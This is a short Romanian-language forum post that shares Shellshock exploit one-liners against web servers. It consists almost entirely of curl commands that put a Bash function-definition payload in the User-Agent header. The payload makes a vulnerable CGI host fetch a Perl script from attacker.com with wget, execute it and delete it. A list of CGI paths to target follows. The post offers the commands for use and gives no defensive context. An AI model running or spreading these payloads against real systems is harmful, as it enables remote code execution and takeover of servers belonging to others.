sonkw Posted June 19, 2020 Report Posted June 19, 2020 Salut! Nu e nou dar am zis sa-l postez. curl -i -X GET -H "User-Agent: () { :;}; /bin/wget -O /tmp/perl.txt http://attacker.com/perl.txt && perl /tmp/perl.txt && rm -rf /tmp/perl.txt"" $1/PATH curl -i -X GET -H "User-Agent: () { :;}; /bin/wget http://attacker.com/ACCES_LOG" IP/PATH curl -i -X GET -H "User-Agent: () { :;}; /bin/wget -O /tmp/perl.txt http://attacker.com/perl.txt && perl /tmp/perl.txt && rm -rf /tmp/perl.txt" IP/PATH PATHS: /cgi-bin/php /cgi-bin/php4 /cgi-bin/php5 /cgi-sys/php5 /cgi-sys/defaultwebpage.cgi /cgi-sys/entropysearch.cgi Quote
